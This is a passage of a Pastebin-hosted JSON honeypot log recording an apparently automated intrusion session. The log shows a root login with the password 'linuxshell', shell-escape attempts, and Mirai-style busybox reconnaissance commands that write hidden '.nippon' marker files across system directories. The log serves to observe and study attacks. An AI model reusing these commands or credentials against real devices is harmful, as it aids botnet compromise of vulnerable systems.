  725. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  726. "timestamp": "2019-08-06T17:34:23.668Z"
  727. },
  728. {
  729. "eventid": "command.input",
  730. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  731. "timestamp": "2019-08-06T17:34:23.662Z"
  732. },
  733. {
  734. "eventid": "command.input",
  735. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  736. "timestamp": "2019-08-06T17:34:23.655Z"
  737. },
  738. {
  739. "eventid": "command.input",
  740. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  741. "timestamp": "2019-08-06T17:34:23.647Z"
  742. },
  743. {
  744. "eventid": "command.input",
  745. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  746. "timestamp": "2019-08-06T17:34:22.913Z"
  747. },
  748. {
  749. "eventid": "command.input",
  750. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  751. "timestamp": "2019-08-06T17:34:22.9Z"
  752. },
  753. {
  754. "eventid": "command.input",
  755. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  756. "timestamp": "2019-08-06T17:34:22.894Z"
  757. },
  758. {
  759. "eventid": "command.input",
  760. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  761. "timestamp": "2019-08-06T17:34:22.888Z"
  762. },
  763. {
  764. "eventid": "command.input",
  765. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  766. "timestamp": "2019-08-06T17:34:22.882Z"
  767. },
  768. {
  769. "eventid": "command.input",
  770. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  771. "timestamp": "2019-08-06T17:34:22.877Z"
  772. },
  773. {
  774. "eventid": "command.input",
  775. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  776. "timestamp": "2019-08-06T17:34:22.865Z"
  777. },
  778. {
  779. "eventid": "command.input",
  780. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  781. "timestamp": "2019-08-06T17:34:22.859Z"
  782. },
  783. {
  784. "eventid": "command.input",
  785. "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  786. "timestamp": "2019-08-06T17:34:22.617Z"
  787. },
  788. {
  789. "eventid": "command.input",
  790. "input": "/bin/busybox ps; /bin/busybox ECCHI",
  791. "timestamp": "2019-08-06T17:34:22.375Z"
  792. },
  793. {
  794. "eventid": "command.input",
  795. "input": "bash",
  796. "timestamp": "2019-08-06T17:34:21.3Z"
  797. },
  798. {
  799. "eventid": "command.input",
  800. "input": "terminal",
  801. "timestamp": "2019-08-06T17:34:21.298Z"
  802. },
  803. {
  804. "eventid": "command.input",
  805. "input": "linuxshell",
  806. "timestamp": "2019-08-06T17:34:21.296Z"
  807. },
  808. {
  809. "eventid": "command.input",
  810. "input": "sh",
  811. "timestamp": "2019-08-06T17:34:21.295Z"
  812. },
  813. {
  814. "eventid": "command.input",
  815. "input": "shell",
  816. "timestamp": "2019-08-06T17:34:21.292Z"
  817. },
  818. {
  819. "eventid": "command.input",
  820. "input": "enable",
  821. "timestamp": "2019-08-06T17:34:21.043Z"
  822. },
  823. {
  824. "eventid": "login.success",
  825. "geoip": {
  826. "city_name": "",
  827. "country_name": "Netherlands"
  828. },
  829. "password": "linuxshell",
  830. "timestamp": "2019-08-06T17:34:20.385Z",
  831. "username": "root"
  832. }
  833. ]
  834. }
  835. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!